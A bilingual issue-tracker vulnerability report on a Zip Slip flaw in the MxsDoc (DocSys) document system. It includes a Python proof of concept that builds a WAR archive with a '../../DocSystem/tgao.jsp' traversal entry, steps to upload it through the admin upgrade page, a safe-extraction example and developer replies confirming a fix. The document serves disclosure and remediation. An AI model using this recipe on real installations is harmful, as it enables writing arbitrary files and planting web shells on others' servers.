[Defect] Zip Slip vulnerability

Status: Done
Created on 2022-12-09 16:57

Instructions in English

Description

There is a Zip Slip vulnerability in the MxsDoc (DocSys) application that can cause malicious jsp files to be uploaded. The vulnerability is located in the BaseController.java file, where the unZip method does not check for "../". This vulnerability can also be triggered by the upgradeSystem method of the ManageController.java file, which writes a malicious jsp file to the web directory.

Impact

  1. Affected version: less than or equal to DocSys_V2.02.37 (latest version)
  2. Condition of utilization: administrator or super administrator rights are required
  3. Impact: a zip slip vulnerability in this system can result in getshell

Code Audit

The com.DocSystem.Controller.BaseController#unZip method contains the following code snippet (shown in a screenshot in the original report):

The value of entry.getName() is controllable. By injecting "../", the malicious jsp file can be written to the web root.

Looking for a trigger point, we found that the com.DocSystem.Controller.ManageController#upgradeSystem method calls the com.DocSystem.Controller.BaseController#unZip method.
The key code is shown in a screenshot in the original report.

Steps to reproduce

Application Installation

This system is available on both github and gitee, and there is a war package on github for easy deployment. The download address is: https://github.com/RainyGao-GitHub/DocSys/releases

After downloading DocSystem.war, unzip it, place it in the tomcat webapps directory, and modify the database configuration file jdbc.properties:

db.type=mysql
db.driver=com.mysql.cj.jdbc.Driver
db.url=jdbc:mysql://localhost:3306/DocSystem1?useUnicode=true&characterEncoding=UTF-8&serverTimezone=UTC
db.username=root
db.password=root

After tomcat has started successfully, visit http://localhost:8080/DocSystem/web/index.html
During application initialization, you need to create a system administrator: admin/admin123

Create malicious compressed files

Contents of the tgao.jsp file:

<html>
<body>
	<%
        out.println("zip slip getshell.");
    %>
</body>
</html>

Write a python script that compresses the jsp file into DocSystem.war and gives it the entry name ../../DocSystem/tgao.jsp, which corresponds to entry.getName() in the source code.

import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ## the zip file to generate
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ## file to compress, and the name it is given inside the zip
        zipFile.close()
    except IOError as e:
        raise e

Run the python script to generate the DocSystem.war file.

Exploitation of vulnerabilities

After logging in to the system as admin/admin123, go to http://localhost:8080/DocSystem/manager/main.html
Click the Upgrade button and upload the malicious compressed file DocSystem.war.
Click the Confirm button, then visit: http://localhost:8080/DocSystem/tgao.jsp
The tgao.jsp file was successfully written.

Bug Repair Suggestions

Check whether the value returned by entry.getName() contains "../" and block it.

Instructions in Chinese

Vulnerability description

MxsDoc (DocSys) has a Zip Slip vulnerability that can lead to the upload of malicious jsp files. The vulnerability is located in the BaseController.java file, where the unZip method does not check for ../ when extracting files, so a Zip Slip vulnerability exists; it can also be triggered through the upgradeSystem method of the ManageController.java file. This can result in a malicious jsp file being written into the web directory.

Vulnerability impact

Affected version: less than or equal to DocSys_V2.02.37 (latest version)
Condition of utilization: administrator login is required
Impact: the zip slip in this system can result in getshell

Vulnerability discovery

The com.DocSystem.controller.BaseController#unZip method contains the following code snippet (shown in a screenshot in the original report).
The value of entry.getName() is controllable; through ../ the malicious jsp file can be written to the web root.
Looking for a trigger point, we found that the com.DocSystem.controller.ManageController#upgradeSystem method calls the com.DocSystem.controller.BaseController#unZip method.
The key code is shown in a screenshot in the original report.

Vulnerability reproduction

Create the malicious archive

Contents of the tgao.jsp file:

<html>
<body>
	<%
        out.println("zip slip getshell.");
    %>
</body>
</html>

Write a python script that compresses the jsp file into DocSystem.war and gives it the entry name ../../DocSystem/tgao.jsp; this value corresponds to entry.getName() in the source code.

import zipfile

if __name__ == "__main__":
    try:
        zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ## the zip file to generate
        zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ## file to compress, and the name it is given inside the zip
        zipFile.close()
    except IOError as e:
        raise e

After running it, the DocSystem.war file is generated.

Exploitation

The zip slip vulnerability can be used to write any file into any directory on the server that is writable; if the file already exists it is overwritten directly. To have a directly visible effect, the demonstration writes a jsp file into the web directory, as follows:
After logging in to the system as admin/admin123, visit:
http://localhost:8080/DocSystem/manager/main.html
Click System Upgrade and upload the prepared malicious compressed file DocSystem.war.
Click Confirm.
Visit: http://localhost:8080/DocSystem/tgao.jsp
tgao.jsp was successfully written.

Repair suggestions

Check whether entry.getName() contains ../ and block it.
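The repair suggestion above (given in both language sections) asks for a check on entry.getName(). As an added example, not the project's own code, the following Python shows the form that check should take: every entry name is resolved against the extraction directory and rejected if it lands outside it, which also catches absolute names, drive letters, backslash separators and names like "a/../../x" that a plain "../" substring test would miss. The in-memory archive, its entry names and the destination directory are constructed for illustration; the same canonical-path comparison applies to the Java unZip method.

```python
import io
import os
import zipfile


def build_sample_archive(with_traversal=True):
    """Constructed in-memory archive: a benign entry plus, optionally, a Zip Slip entry like the one on this page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        if with_traversal:
            zf.writestr("../../DocSystem/tgao.jsp", "<% out.println(1); %>")
    return buf.getvalue()


def is_entry_safe(dest_dir, name):
    """True only if the entry resolves inside dest_dir. A plain "../" substring test misses
    absolute names, drive letters, backslashes and forms like "a/../../x", so compare canonical paths."""
    dest = os.path.realpath(dest_dir)
    normalized = name.replace("\\", "/")  # treat backslashes as separators, as Java's File does on Windows
    if normalized.startswith("/") or normalized[1:2] == ":":
        return False  # absolute path or drive letter
    target = os.path.realpath(os.path.join(dest, normalized))
    return target == dest or target.startswith(dest + os.sep)


def find_unsafe_entries(zip_bytes, dest_dir):
    """Names of every entry that would escape dest_dir; run this before extracting anything."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if not is_entry_safe(dest_dir, n)]


def safe_unzip(zip_bytes, dest_dir):
    """Refuse the whole archive if any entry is unsafe; otherwise extract and return the names written."""
    bad = find_unsafe_entries(zip_bytes, dest_dir)
    if bad:
        raise ValueError("refusing archive with path traversal entries: %s" % bad)
    dest = os.path.realpath(dest_dir)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename.replace("\\", "/"))
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written
```

Rejecting the whole archive, rather than skipping the bad entry, is deliberate: an upgrade package containing a traversal entry is not trustworthy and should be logged and dropped.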

Comments (2)


The next version will add a relative-path check on zip entry names to prevent files being injected through relative paths.


A relative path check was added to avoid illegal file injection during unzip.
